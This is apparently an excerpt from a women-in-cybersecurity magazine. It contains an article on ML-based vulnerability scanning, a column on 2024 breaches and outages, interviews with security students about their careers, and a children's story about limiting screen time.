www.linkedin.com/in/marisealphonso

THE FUTURE OF AUTOMATED VULNERABILITY SCANNING

REVOLUTIONISING CYBERSECURITY

In the dynamic world of cybersecurity, every moment brings a new idea, a phoenix arising from the ashes of challenging times. The adoption of ML and AI tools in automated vulnerability scanning is considered one of the biggest gamechangers in the cybersecurity world. These technologies are not only making the work smoother but are entirely changing the way threat defence is undertaken, creating a revival in the fight against the onslaught of cyber threats.

Remember how penetration testing used to be about messy, manual processes? Well, we are at the dawn of a new world of smooth automation, thanks to some really cool self-adjusting tools set to make digital defence much more effective and accessible. They represent a fresh start in scanning for vulnerabilities, stretching the limits of what we can do.

PENETRATION TESTING GETS REIMAGINED WITH ML-POWERED TOOLS

Traditional penetration testing has been effective, but often it depended on several different tools, each designed to find a specific type of attack, such as SQL injection or cross-site scripting, or a specific weakness, such as an insecure configuration. They required a tester to juggle several tools, often wasting a lot of time and effort.

The rise of machine learning provides the cybersecurity industry with an opportunity to emerge stronger from these limitations. Imagine an innovative, integrated tool using ML to identify vulnerabilities and rank risks, rate the feasibility of specific exploits and predict new attacks. It would be like a phoenix rising from the ashes, taking the power of what we had learnt previously and mixing it with the speed and vision we need for what’s coming next. Some of these new tools, like OpenVAS, already do some automation, but get better with the introduction of ML that learns from large volumes of data and dynamically adapts to new vulnerabilities.

This whole shift to ML-powered tools is going to be a gamechanger for penetration testing. Workflows will be easier and mundane tasks will be taken over, which means cybersecurity professionals will be able to focus their time and energy on more elaborate mitigation strategies and on enhancing general security.

FLORENCE KABONA

EMPOWERING EVERYDAY USERS

While this will surely greatly enhance the work of penetration testers and other security professionals it will also benefit others. Regular users, usually poorly or not at all protected and generally less aware of the dangers lurking in cyberspace, will be empowered through these new technologies.

ML-powered tools will create a shield for nontechnical users by powering websites that offer scanning for phishing or malware and warn users in advance against scams. They can flag suspicious websites and activities, adding an extra layer of protection previously available only from experts. With all the tools at their disposal, users are no longer sitting ducks but become very active participants in keeping themselves safe online.

These capabilities could expand to observing personal devices for suspicious activities, informing users about impending breaches and advising them how to mitigate such risks. Democratisation of cybersecurity expertise, enabled by ML, would make for a safer online ecosystem and bridge the gap between technical expertise and public availability.

MACHINE LEARNING AND THE EVOLUTION OF THREAT LANDSCAPES

Meanwhile, the threat actors are becoming more cunning, and the good old signature-based detection hardly keeps pace. That’s where ML-based tools come in handy. They learn from past attacks. They can anticipate and deliver on-the-fly identification of new vulnerabilities.

Much as the phoenix rises renewed from the ashes, so does ML help cybersecurity tools evolve on-the-go, always improving and adjusting to the ever-changing landscape of threats.

Advanced tools and technologies can scan multiple attack surfaces simultaneously, predict complex threats and prescribe preventive measures. Thus, machine learning will ultimately facilitate a paradigm shift from reactive to proactive security, making it possible for systems to anticipate threats before they materialise. The future of cybersecurity will not depend upon mere human intervention; it will depend on enhanced intelligent systems that can discern even the most subtle patterns in attacks.

ETHICAL CONSIDERATIONS AND RISKS

These technologies promise immense benefits in the hands of cybersecurity professionals but are also being embraced by adversaries. Hence, cybersecurity professionals need to surmount the challenges thrown up by the unethical use of these potent tools.

Another problem arises from our increasing dependence on these automatic systems. Although ML can deliver speed, intuition and experience cannot be totally replaced. These technologies are augmentative; they are not substitutes for the skill and judgment of the penetration tester and security professional. Rather, what’s required is finding the right balance whereby automation bolsters security without rendering expertise irrelevant.

A BALANCED VIEW OF THINGS AHEAD

You will see the progress: from OpenVAS to AI phishing detection systems, foreshadowing a future in which cybersecurity will become much more effective, adaptive and available. The industry keeps changing. Embedding ML into vulnerability scanning tools is bound to make the digital world safe for one and all, from the pros to commoners.

www.linkedin.com/in/florence-kabona-a6b54b171/

KAREN STEPHENS

Karen Stephens is the co-founder and CEO of BCyber. After more than 25 years in financial services, Karen moved into SME cybersecurity risk management. She works with SMEs to protect and grow their businesses by demystifying the technical aspects of cybersecurity and helping them to identify and address cybersecurity and governance risk gaps. She was recently named inaugural Female Cyber Leader of the Year at the 2023 CyberSecurity Connect Awards in Canberra.

COLUMN

Reflecting on 2024: the year that changed everything for us

Welcome to the tail end of 2024! My oh my, hasn’t it been a big year?

We kicked off the year with the ‘Mother Of All Breaches’. Then our new financial year celebrations were rudely interrupted by the ‘CrowdStrike Outage’ (thanks guys), and just when we thought the year couldn’t get any busier our favourite regulators, ASIC and APRA, released their 2025 corporate plans (no prizes for guessing what’s on my reading list). Then, we rounded out the year with the federal government making some interesting choices with respect to social media access (in the interests of full disclosure, I’d like to give a shout out to my favourite sub 16 year old child).

But, as I always say, don’t let a good cyber incident go to waste. It’s cheaper to learn from the misfortunes of others than it is to ‘go it alone’ and have your very own cyber incident. So, let’s have a quick look at lessons we can learn from 2024.

THE MOTHER OF ALL BREACHES (MOAB).

This super breach saw some 26 billion records equating to 12 terabytes of leaked data from a variety of sources exposed. The key word here is ‘variety’. This was one of the first cyber incidents of its size and type. You had a malicious actor (aka cybercriminal) who pulled together data from multiple sources (old breaches, leaks etc, some published and some not) and combined them into nice, neat ready for sale ‘information packs’. So, if you haven’t updated your passwords this year for—well pretty much everything—now is the time!

PPPPP

Or, as my old manager used to say: Prior Preparation Prevents Poor Performance. Our teacher here is the Medibank incident of 2022. Their cyber incident and clean-up costs are set to reach $A126m by 2025. So, if you don’t have a lazy couple of million in the bank to cover the cost of a cyber breach, end your year with an independent cyber assessment so you know what you actually have in place rather than what you think is in place. Make sure the assessment incorporates technology and operational areas and identifies your gaps, then put in place a program to address them.

ATTENTION TO DETAIL

Cybersecurity isn’t just a tech issue. (This is the hill I am prepared to die on!) I cannot say this often enough; and this year we have lived through two amazing examples of cybersecurity issues where the human element was the source. The CrowdStrike Outage affected less than one percent of Windows machines globally, but resulted in significant global mayhem. It was caused by a bug in an update. I wonder how that bug got through user acceptance testing (UAT). And, thanks to , we now understand first-hand how important it is to ensure our backups are checked and checked again. An ‘inadvertent misconfiguration’ during the provisioning of UniSuper’s cloud services triggered an ‘auto-kill’ and saw the wiping of UniSuper’s entire Google Cloud (including all its backups stored on the service). With over 615,000 members and $A124b in funds under management as of 30 June 2023, the disruption of UniSuper’s online member services was not a good look. Both incidents could have been avoided with a little more attention to detail.

SOCIAL MEDIA AND CHILDREN

Well, this is a bit of a moveable feast at the moment and, unfortunately, I don’t have a ‘magic bullet’. But what I do know is this: the fact this topic is being discussed (and debated) is a good thing. My column from earlier this year Are you ever too young to start your cyber safety journey? doesn’t have all the answers, but it does have a few handy hints to help you start your child’s cyber safe journey.

May you and yours have a cyber-safe festive season with 2025 bringing only peace, joy and happiness.

www.linkedin.com/in/karen-stephens-bcyber

www.bcyber.com.au x.com/bcyber2

karen@bcyber.com.au youtube.bcyber.com.au/2mux

STUDENT IN SECURITY SPOTLIGHT

Lunyolo Evelyn Kirabo is a final-year student at Makerere University, pursuing a degree in Information Systems and Technology with a special focus on cybersecurity and DevSecOps, and has a passion for integrating development, security, and operations.

Information Systems and Technology student at Makerere University

In a casual conversation with someone unfamiliar with the field, how do you articulate the excitement and potential of a career in cybersecurity, aiming to spark their interest?

Cybersecurity is such an exciting and ever-changing field. What really draws me in is the challenge of staying one step ahead of cybercriminals and knowing that I’m making a real difference by securing systems and protecting sensitive data. It’s not just about stopping attacks; it’s about being proactive— building security into the development process from the start and designing systems that are resilient by nature. Whether it’s ethical hacking, securing cloud environments, or using DevSecOps to automate security in development, there’s always something new to learn and explore. The possibilities for growth and innovation are endless, and that’s what keeps me so passionate about it.

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

When I first thought about studying cybersecurity, I imagined it was all about reacting to breaches or setting up firewalls. But as I’ve dug deeper into the field, I’ve discovered it’s so much more than that. It’s about truly understanding how systems work and finding vulnerabilities before they can be exploited. The rise of DevSecOps has been a game-changer for me, showing how security is woven into every stage of software development, from coding to deployment. The reality is way broader and more complex than I first thought, and it’s only made me more excited to pursue this career.

Upon graduation, which specific cybersecurity role do you aspire to secure employment in, and what motivates your choice?

I’m really excited about the idea of becoming a DevSecOps engineer. This role stands out to me because it’s where security and software development come together. I’m passionate about the concept of weaving security into every stage of the development process. With cyber threats becoming more frequent and sophisticated, I believe secure coding and automated security checks are more important than ever—and I want to be part of that change. It’s the perfect role for me, combining my skills with my drive to build secure systems from the ground up.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

When I decided to pursue cybersecurity, my parents were supportive, though at first, they weren’t quite sure about the field since it was new to them. I took the time to explain how in-demand cybersecurity professionals are and why the field is so important in today’s digital world, and that helped them understand my decision. I did face some challenges along the way, especially from peers who questioned whether a woman could succeed in such a tech-driven industry. But instead of letting it hold me back, I used those doubts as motivation to prove myself.

LUNYOLO EVELYN KIRABO

I was also lucky to have a mentor, Chinenye Chizea, who has been a huge support, always encouraging me to keep pushing forward.

Who or what has been the most influential factor in shaping your journey in cybersecurity so far, and how has it impacted your career aspirations?

The two biggest influences in my journey have been Chinenye Chizea, my mentor from the CyberGirls Fellowship, and my boyfriend, Samson Nathan Wanendeya. Chinenye, as a successful woman in tech, has been a source of invaluable guidance, especially when it comes to navigating the challenges of being a woman in a male-dominated industry. Her mentorship has not only boosted my confidence but has also shaped my career goals, particularly in aiming for leadership roles in DevSecOps. Watching her succeed has shown me that with hard work and the right support, I can thrive in cybersecurity.

Samson has also played a huge role in my growth. He’s been my constant motivator, always pushing me to do better and learn more. He regularly shares resources that align with my interests, mentors me for personal development, and encouraged me to apply for study opportunities. He even helped me record the video that got me into the CyberGirls Fellowship, which took us an entire day to perfect!

From teaching me Python, Java, JavaScript, HTML, and CSS to constantly encouraging me to break through stereotypes like “women don’t code,” he’s been an unwavering source of support and motivation.

Recount the most memorable or significant event in your cybersecurity journey to date, highlighting why it left a lasting impression.

The most memorable moment in my cybersecurity journey has definitely been participating in the CyberGirls Fellowship. It was an incredible experience, bringing together a group of passionate women all eager to learn and support each other in the cybersecurity field. Not only did the fellowship give me valuable technical training, but it also helped me grow personally. Being surrounded by like-minded women who shared the same drive and enthusiasm really stuck with me. It reinforced just how important community, mentorship, and lifting each other up as women in tech truly are.

Beyond your academic studies, what practical experience have you gained in the field of cybersecurity through employment or internships?

Throughout my studies, I’ve actively looked for internships and hands-on projects where I could apply what I’ve learned in the classroom. These experiences have been invaluable in giving me real-world exposure to the security challenges that organisations face and have helped me build practical skills. Working in a DevSecOps environment has been especially exciting, as it’s taught me how to seamlessly integrate security into the development process, which is an area I’m really passionate about.

I’ve also had the chance to participate in the CyberGirls Fellowship, the ALX AI Essentials course, and the Arewa Data Science Fellowship. Right now, I’m working on improving my front-end programming skills, with a little help from my significant other, who’s a front-end developer. He’s been a great support in guiding me through the learning process!

The cybersecurity industry offers various certifications from different organisations. Have you pursued, or do you plan to pursue any of these certifications? If so, which ones, and what factors influenced your choice?

Yes, I’m currently studying for the CCNA certification because I think understanding networking fundamentals is crucial for cybersecurity. It’s such a key area, and the CCNA will give me a solid foundation. On top of that, I’m planning to take the Certified DevSecOps Professional (CDP) exam this December. Since I’m aiming to become a DevSecOps engineer, the CDP certification aligns perfectly with my goals. It will help me develop the skills I need to seamlessly integrate security into the development process. Both certifications are well-recognised in the industry, and I’m excited to use them as tools to help me succeed in my future career.

Given the rapid evolution of cybersecurity threats, do you feel that your academic program adequately keeps pace with the industry’s current landscape?

While my academic program has definitely given me a strong foundation in cybersecurity, I feel like there’s a need for more hands-on, real-world training. Cybersecurity is such a fast-paced field, and with the rise of cloud computing, DevSecOps, and automated security tools, I think academic programs need to update their curricula more often to keep up. I’d love to see more practical labs, real-life case studies, and exposure to the tools used in the industry. I think this would help students like me be better prepared to face the ever-evolving cyber threats out there.

What aspect of your cybersecurity studies excites you the most, and why?

What excites me the most is diving into DevSecOps, especially the idea of weaving security into every step of the software development process. As someone aiming to become a DevSecOps engineer, I’m really eager to learn more about automating security, managing secure development pipelines, and making sure that security is a priority right from the start. This holistic approach to security is not just a trend— it’s crucial in today’s fast-paced development world, where addressing vulnerabilities early on can make all the difference.

Conversely, which aspect of your studies do you find least interesting or useful, and how do you navigate through it?

Some of the more theoretical parts of cybersecurity, like cryptography and network protocols, can definitely be challenging. But I’ve come to appreciate how important they are, so I break them down into smaller chunks to make them more manageable. To help with this, I use online resources and practical examples, which make it easier to see how these concepts apply in the real world. It’s all about finding ways to connect the theory to something I can actually work with!

Are there specific aspects of your cybersecurity studies that you find particularly challenging? If so, what are they, and how do you approach overcoming these challenges?

One of the toughest parts of my studies has been getting a solid grip on advanced cryptographic algorithms and how they’re applied in the real world. To make it easier, I break down the theory behind each algorithm and try experimenting with practical examples. I also lean on online resources and have great discussions with my professors and classmates to really solidify my understanding. It’s a process, but it’s been rewarding as I start to see how it all fits together.

Do you believe there are areas in cybersecurity that deserve more emphasis in your coursework or areas that could receive less focus?

I think my coursework could really benefit from more focus on cloud security and DevSecOps. As more organisations shift their infrastructure to the cloud and automate their development pipelines, these areas are becoming increasingly important. While foundational topics like network security are crucial, I feel these emerging fields need more attention to help students like me get ready for the challenges ahead. It’s all about making sure we’re equipped for the future of cybersecurity.

Considering the holistic requirements of a future role, do you see the need for additional training in non-cyber skills, such as interpersonal communication or management? If yes, why?

Definitely! While technical skills are super important in cybersecurity, I’ve realised that communication and management skills are just as crucial. In roles like DevSecOps, it’s essential to be able to explain security issues to non-technical people and work well with different teams. As I move forward in my career, I know that leadership and project management skills will also be key as I take on more responsibility and lead projects. It’s all about balancing the technical with the practical side of things.

Are you actively engaged in the broader cybersecurity community? If so, what has been your involvement, and how has it enriched your experience?

Yes, I’m actively involved in a few online cybersecurity communities and local meetups. Being part of forums, attending conferences, and connecting with other students and professionals has been a great way for me to stay on top of industry trends, exchange knowledge, and meet people with similar interests. It’s also given me the opportunity to learn from others and apply what I’ve learned in real-world situations, which has been super valuable in my growth.

What is your preferred source for staying informed about cybersecurity trends and general information?

I stay updated by following a few key online platforms, like Reddit’s r/cybersecurity forum, and reading blogs such as KrebsOnSecurity and Dark Reading. I also subscribe to newsletters from organisations like ISC2, EC-Council, Cisco, and SANS, which give me a lot of useful insights on emerging threats and best practices. On top of that, I enjoy listening to podcasts like CyberWire Daily and Darknet Diaries to keep up with the latest happenings in the cybersecurity world. It’s all about staying informed and constantly learning!

Have you ever encountered situations where being a woman in cybersecurity made you feel disadvantaged or discriminated against? If so, please share your experiences.

Luckily, I haven’t experienced outright discrimination, but there have definitely been times when my technical abilities were questioned just because I’m a woman. Those moments were tough, but instead of letting them get me down, I saw them as chances to prove myself. Having a solid support network of mentors and other women in tech has really helped me push through these challenges and keep moving forward. It’s all about finding strength in those who lift you up.

What measures do you have in place to enhance your personal cybersecurity in today’s digital landscape?

I make sure to use strong, unique passwords for each of my accounts and rely on a password manager to keep them all organised. I also turn on two-factor authentication (2FA) for my important accounts and stay on top of software updates. To keep my browsing secure, I always use a VPN, and I back up my data regularly to protect against ransomware. Staying proactive with these steps gives me peace of mind knowing I’m doing my best to stay safe online.

Reflecting on your journey thus far, would you, with the benefit of hindsight, make any changes to your career trajectory? If yes, what adjustments would you consider?

Looking back, I wish I had started gaining more hands-on experience earlier, particularly in areas like DevSecOps and cloud security. Getting practical experience in these fields would have really helped me strengthen my skills and better understand how the concepts I’m learning are applied in the real world. I’ve definitely learned the value of getting hands-on sooner rather than later!

Have you actively sought employment opportunities in the cybersecurity field, and if so, what has been your experience with the application and interview process?

I’ve been applying for internships and entry-level roles in cybersecurity, and while the process has had its challenges, it’s also been incredibly rewarding. Preparing for interviews has really pushed me to sharpen my technical knowledge, and I’ve learned how important it is to tailor my resume to highlight the skills that matter most. Every application and interview is a chance to grow and get one step closer to my career goals.

Looking ahead, I’m really excited about the opportunities in DevSecOps and cybersecurity as I approach graduation. With my CCNA studies in progress and the Certified DevSecOps Professional (CDP) exam coming up in December, I feel confident that I’m on the right path. I’m eager to find a role where I can contribute meaningfully to the cybersecurity field and continue learning and growing.

www.linkedin.com/in/evelyn-kirabo-lunyolo-a43881270

In a casual conversation with someone unfamiliar with the field, how do you articulate the excitement and potential of a career in cybersecurity, aiming to spark their interest?

As a Gen-Z hacker who’s had the chance to discuss cybersecurity with over 200 people, from young kids to government CISOs, I’ve realised that pop culture plays a huge role in getting people excited about the topic.

The way movies and TV shows portray “hacking a bank” or pulling off some epic cyber-heist definitely sparks interest in students. Of course, I always make sure to emphasize the importance of ethical practices.

I like to kick things off with something simple and relatable, like, “I have a life on my phone.” It’s a conversation starter that helps people understand how much personal data they carry around daily. Then, I guide them into realising just how vulnerable that “life” can be, and what steps they can take to protect it.

When I introduce teenagers to cybersecurity, I usually focus on IoT security (especially pentesting) and OSINT. These topics hit home because they feel tangible and real, not abstract concepts.

I find that telling a student how their favorite coffee machine can be hacked or how a photo on Instagram can reveal the location of their celebrity crush’s house brings cybersecurity down to earth. It shows them that the real-world application of cybersecurity is just as cool – if not cooler – than what we see in movies.

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

What first sparked my interest in cybersecurity was actually pop culture. There’s a Netflix series called Salvation where the female leader of a hacker group saves the world by hacking, and I really connected with her. At that moment, I thought, “That’s me!” But, I quickly realised that cybersecurity is often misunderstood by the media.

Even though I had a strong background in competitive programming, I used to think hacking was too technical for me. I felt like I didn’t fit the stereotypical image of a “tomboy hacker in a hoodie,” and honestly, I thought I was “too dumb” or “too girly” to be a part of that world. When I started studying for an industry exam like the (ISC)² CC at just 14 years old, I hadn’t even finished middle school yet. The study materials felt like they were written in a foreign language, so complicated that it almost discouraged me. But I knew that modern problems needed modern solutions.

So, I started creating my own analogies to break down these complex concepts—like using Charlie and the Chocolate Factory to explain the OSI model. It made things so much easier to grasp. Even now, when I’m learning or teaching, I rely on these creative analogies to relate technical terms to everyday scenarios or fictional worlds. And honestly, who wouldn’t enjoy using a Christmas party to explain security principles?

BANDANA KAUR
Bandana Kaur, a dedicated and motivated student currently in the 12th grade at High School in Delhi, India.
High school student in India

Upon graduation, which specific cybersecurity role do you aspire to secure employment in, and what motivates your choice?

Passion and principles have always been at the core of my decisions, and that’s certainly true when it comes to my career path. For me, a strong offense is the best defense—especially when it comes to tackling the next generation of cyberthreats. I’ve chosen offensive security engineering as my future career because I’m driven—not just to learn, but to contribute to something bigger than myself. I want to play a part in keeping the digital world safe, ensuring it stays secure for the generations that follow. The idea of making a real difference motivates me, and offensive security engineering is where my skills and passion align the most.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

When I first decided to pursue a career in cybersecurity, my parents had no idea I was even interested in it. It wasn’t until two years later, when I was featured on my first podcast episode on Talent First - The Podcast, that they realised what I was up to. While they never actively opposed my choice, navigating this path on my own was tough. With only a middle school background and no mentors or peers to guide me, I often felt lost and overwhelmed. But my passion—and the support of my parents—kept me moving forward.

The challenges didn’t stop there, but I’ve learned that sometimes, obstacles are just opportunities in disguise. My journey hasn’t been traditional, but the fulfillment I get from pursuing my passion and making a real impact in cybersecurity makes every bit of it worth it.

Beyond your academic studies, what practical experience have you gained in the field of cybersecurity through employment or internships?

As a high school senior, one of my proudest professional moments was participating in Microsoft’s Future Ready Talent Internship Program, where I got to dive deep into AI and Security using Azure. For my final project, I built a network monitoring tool that gave me hands-on experience with real-world problem-solving and helped me understand the complexities of network security. The tool I developed allows for virtual network creation, real-time monitoring with network watchers, packet capture for traffic analysis, and much more. It was an amazing opportunity, and I’m excited for more experiences like this once I finish high school!

What aspect of your cybersecurity studies excites you the most, and why?

What excites me most about studying cybersecurity is the chance to make a real impact through Vulnerability Disclosure Programs (VDPs). Being able to ‘hack’ real-world systems and apply what I’ve learned in a hands-on way gives me an adrenaline rush, especially when I’m reporting security flaws that could be exploited by bad actors—kind of like a Batwoman moment. Through these programs, I’ve had the opportunity to help secure organisations like NASA, the US Department of Education, and the Indian Government. What’s even better is that participating in responsible disclosure programs helps connect the dots between what I learn in theory and how it actually makes a difference in the real world.

Are you actively engaged in the broader cybersecurity community? If so, what has been your involvement, and how has it enriched your experience?

I’ve built an amazing and supportive community with over 30K followers on Instagram and nearly 9K on LinkedIn, where we dive into everything from the latest trends in cybersecurity and AI to taking on OSINT challenges together. On top of that, I’ve been a Cybersecurity Career Ambassador for the US National Initiative for Cybersecurity Education (NICE) by NIST for about a year, where I’m most actively involved. This community has been crucial to my growth, helping me connect with mentors who continue to inspire and guide me.

As a way to give back, I organised a free, gamified event during Cybersecurity Career Week in October, designed to introduce Gen-Z to the field. The event, which was full of fun, interactive DFIR activities, was themed around Among Us to keep it engaging and spark interest in cybersecurity in a way that felt accessible and exciting.

Have you ever encountered situations where being a woman in cybersecurity made you feel disadvantaged or discriminated against? If so, please share your experiences.

While I haven’t faced direct discrimination, I’ve definitely felt the weight of being underestimated simply because I’m a young woman. There have been times when I felt like I had to prove myself more than my male peers. But instead of holding me back, those challenges pushed me to work even harder.

Starting my personal brand, HackWitHer, was my way of tackling the “dream gap” that often holds young people—especially women—back from pursuing STEM careers. Passion and intelligence aren’t defined by gender, and I hope to be a part of breaking down stereotypes and showing others that they can follow their passions without limits.

www.linkedin.com/in/hackwither

www.instagram.com/hackwither

Sophia Aspera, a passionate second-year student pursuing a Bachelor of Information Technology with a major in Cybersecurity at Macquarie University

Bachelor of Information Technology student at Macquarie University

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

I chose cybersecurity because it really stood out to me compared to other IT fields. When people think of cybersecurity, they usually imagine a hooded hacker trying to steal your data, but for me, it’s always been more like a puzzle or a game. I’ve always loved games and solving problems, so the idea of a cat-and-mouse chase with an adversary really grabbed my attention.

As I’ve learned more about the field, I’ve realised that cybersecurity isn’t just about technical stuff or red team versus blue team scenarios. It’s just as much about people and the physical environments as it is about computers. In fact, the human element is huge—everyone in an organisation needs to follow security policies for the system to stay safe, whether they’re defending or unintentionally creating vulnerabilities. It’s also more creative than I originally thought. Hackers are always looking for new ways to exploit weaknesses, so thinking outside the box and being open-minded are key skills to have in this field.

What I love most is how fast the field evolves—it keeps you on your toes and makes every day a new challenge.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

My parents and peers have always been incredibly supportive, but I think a lot of the challenges I faced came from my own perception of the field and a feeling of imposter syndrome. I went to an all-girls high school with a small but passionate computing class, and I didn’t have many female role models in tech to turn to for advice. The lack of other girls pursuing IT or cybersecurity was a bit discouraging at first, especially because it felt like stepping into a male-dominated world.

But things really changed toward the end of high school when I joined a programming workshop run by women in IT for high school girls called the Girls Programming Network (GPN). The session I attended focused on hashing passwords, and at the end of the day, we had a mentor hangout where we could talk to women working or studying in IT about their experiences. Hearing their stories and realising that the field wasn’t as intimidating as I had thought made me feel much more confident about pursuing IT studies. The cybersecurity content of the workshop was also super interesting and motivated me even more to dive deeper into the field.

Now, I volunteer with GPN to help encourage other high school girls to explore coding and hopefully show them how fun and rewarding IT can be!

Who or what has been the most influential factor in shaping your journey in cybersecurity so far, and how has it impacted your career aspirations?

Honestly, it’s my peers and lecturers who really inspire me to push myself and get more involved in the field. Being around people who are passionate about what they’re learning and teaching is incredibly motivating—their enthusiasm is contagious! It’s made me want to dive deeper into cybersecurity beyond just the classroom.

One of the clubs I’m currently part of is the MQ Hack Hub, which started this year. It’s a great space for people at all skill levels to learn more about Capture The Flag (CTF) challenges, specifically the jeopardy-type ones. These challenges are all about solving computer security-related questions under pressure, and they cover everything from binary exploitation to open-source intelligence (OSINT). The practice I’ve gotten in the club and the support from my peers really gave me the confidence to join my first CTF competition.

Being surrounded by such a diverse group of people has also opened my eyes to the many different paths in cybersecurity, from penetration testing to governance, risk management, and compliance. I’m excited to explore all these areas and figure out what excites me the most!

Recount the most memorable or significant event in your cybersecurity journey to date, highlighting why it left a lasting impression.

One of my most memorable experiences so far was joining my first jeopardy-type CTF competition and winning first place with my team. It was definitely a challenge, and I had to really step out of my comfort zone. But it was such a rewarding experience, not only for the win but for all the learning that happened along the way. I got to dive into different areas of computer security, like cryptography and reverse engineering, and it was exciting to see how much my skills developed throughout the competition.

The competition lasted for four weeks, run by SECedu, and every week we were given new challenges to solve faster than other teams. I was part of an amazing team of talented individuals, and working with them for a month straight was an incredible learning experience. It taught me not only technical security skills but also the value of perseverance and teamwork.

One of the highlights for me was the cryptography challenge. We spent hours working through it and hitting dead ends, and when we finally cracked the cipher and found the flag, it felt like a huge accomplishment. We kept working hard every week, and there was a moment when the point gap between teams got really tight. Seeing my team hold onto first place at the end of the competition was so rewarding, and I’ll definitely never forget that feeling.

What aspect of your cybersecurity studies excites you the most, and why?

I’m really excited to dive deeper into the governance side of cybersecurity. While my studies so far have given me a solid foundation in IT — like programming and networking — I’m eager to explore how governance, risk management, and compliance tie cybersecurity to business goals. It’s fascinating to shift away from just the technical side and learn how policies and regulations are built around the vulnerabilities we find in the systems we work with. As the digital landscape is always changing, I’m looking forward to learning how we can adapt existing frameworks to keep up with those shifts and ensure companies remain secure while meeting regulatory requirements.

Are there specific aspects of your cybersecurity studies that you find particularly challenging? If so, what are they, and how do you approach overcoming these challenges?

I’ve found that classes heavy on concepts, like applied cryptography, can be tough to get through, especially when there’s so much information to absorb. While I really want to deepen my understanding of these topics, it can sometimes feel overwhelming. To help manage this, I’ve started forming study groups with friends who are taking the same courses. Explaining concepts to each other in simpler terms has made it easier to digest the material. My university also offers support services like the Computing Drop-In Centre, where we can get help with specific content or problems we’re struggling with. Having a supportive community and access to resources has definitely helped me break down complex material into more manageable pieces.

Considering the holistic requirements of a future role, do you see the need for additional training in non-cyber skills, such as interpersonal communication or management? If yes, why?

Absolutely! I believe developing non-technical skills is just as important as the technical ones, especially when it comes to becoming a well-rounded professional. The technical knowledge we gain in school is essential, but if you can’t communicate your ideas clearly and appropriately, it can be a real disadvantage. In cybersecurity, you often have to collaborate with others, whether it’s your team, non-technical colleagues, or even clients. Knowing how to explain complex concepts in a way that makes sense to your audience, and working together to leverage everyone’s strengths, are crucial skills. These soft skills aren’t always explicitly taught in our programs, but I think focusing on them will help us adapt and succeed in any role we take on in the future.

What measures do you have in place to enhance your personal cybersecurity in today’s digital landscape?

I always encourage my friends and family to avoid reusing passwords, and I make sure to follow this rule myself. I try to use long, unique passwords that don’t include common words and mix in numbers, symbols, and different characters. Another important step I take is enabling multifactor authentication (MFA) for all my accounts – it’s an extra layer of protection that really helps safeguard my information.

There are a few other habits that I think are basic but still super important. For example, I always change the default passwords on new devices as soon as I get them, like for routers or smart home gadgets. I also avoid accessing sensitive sites—like banking or health apps—while using public Wi-Fi. It’s become even more crucial with remote work becoming the norm, especially since the pandemic.

Lastly, I’m very cautious about how much personal information I put online. Growing up, my parents always warned me about “stranger danger,” but it wasn’t until I got into OSINT challenges through CTFs that I realised just how much personal info can be dug up from even a single public profile. So, I’ve made a habit of keeping my social media accounts private and removing sensitive details like my school name or birthdate from my bios. It’s all about protecting your privacy!

www.linkedin.com/in/sophia-a-90a284304

LISA ROTHFIELD-KIRSCHNER

Director at Private Wealth Network | Impactful Education & Peer Experiences for Family Office

Olivia and Jack navigate screen time limits

Twins Olivia and Jack loved exploring the world around them and were fascinated by the magical world of the internet. They enjoyed playing games, watching videos and chatting with their friends online.

Olivia and Jack’s parents often cautioned them not to spend too much time online and to make sure they had a balance between screen time and other activities. However, Olivia and Jack had been home from school for a few weeks recently with a nasty virus and had been glued to their screens. They had made a full recovery, but were finding it hard to get back to normal, and their parents were worried they were missing out on other important activities like playing outside, reading books and spending time with friends and family.

Sunday evenings were always family dinner evenings and one Sunday their parents said: “We need to talk about your screen time. We love that you’re excited about learning and having fun online, but it’s important to have a balance.”

Olivia, often quick to get upset, said: “But we love playing our games and watching our favourite shows!” Jack added, “We use our screens to connect with our friends, and EVERYONE ELSE is on their screens socialising!”

Their parents sighed and explained to them: “In our house we have guidelines, and we need to get back to using them to make sure we have a healthy relationship with technology and our devices. We don’t want you getting addicted!

“We know you use technology to learn about the world, and we are impressed by how much knowledge you have accumulated, Olivia. We also know you use #cyberchat to stay connected to your friends, Jack. But if we don’t limit your screen time then this can lead to problems.”

“Like what?” Jack asked.

“Well,” their parents explained, “spending too much time on screens can make it harder to focus on schoolwork, and it can affect your sleep. Plus, you might miss out on other fun activities like playing sports, reading and just hanging out in real life with your friends and family.”

Olivia and Jack thought about this. They loved their screen time, but they also enjoyed playing basketball, riding their bikes, reading and beating their opponents at chess.

“So, what should we do?” asked Olivia.

Their parents said, “Let’s set some limits to help you have a healthy balance. How about we have screen time for half an hour after school and a little more on weekends? The rest of the time, you can spend either outside at the park shooting hoops, riding your bikes around the track, and with your friends in real life. You can use devices for your homework as you need to, but don’t cheat because we will be monitoring you!”

Jack was unsure, but eventually said, “OK, that sounds fair. We can still play our games and chat with our friends on #cyberchat, but we’ll have more of a balance for other activities.”

Over the next few weeks Olivia and Jack got back to their normal ways and soon forgot they had been constantly glued to their screens. Olivia still spent time ‘cyber tubing’ about her favourite topics, and Jack still had time to chat with his friends on #cyberchat and play #cybernite, but they also spent time catching up on the books they had borrowed from the library and hanging out with their friends and family.

The next Sunday at family dinner, Olivia announced: “I’m feeling much happier having more balance in my online vs offline time.” Jack said “I agree with you. I missed spending more time outdoors.”

And so, Olivia and Jack learnt the importance of balancing their screen time with other activities. They realised being online and on their devices was enjoyable, but there was also a whole world of adventures waiting for them offline, and having a balance between these and screen time was best.

In the next issue we will learn about the importance of security platforms

www.linkedin.com/in/lisarothfield-kirschner

howwegotcybersmart.com

How We Got Cyber Smart addresses cyber safety, cyber bullying and online safety for elementary school-aged children.

Lisa has partnered with Cool.Org, and her content is found on the Department of Education website.

WOMEN IN SECURITY MAGAZINE

1. AMANDA-JANE TURNER

Author of the Demystifying Cybercrime series and Women in Tech books. Conference Speaker and Cybercrime specialist

2. JAHNAVI GURRAPPADIA

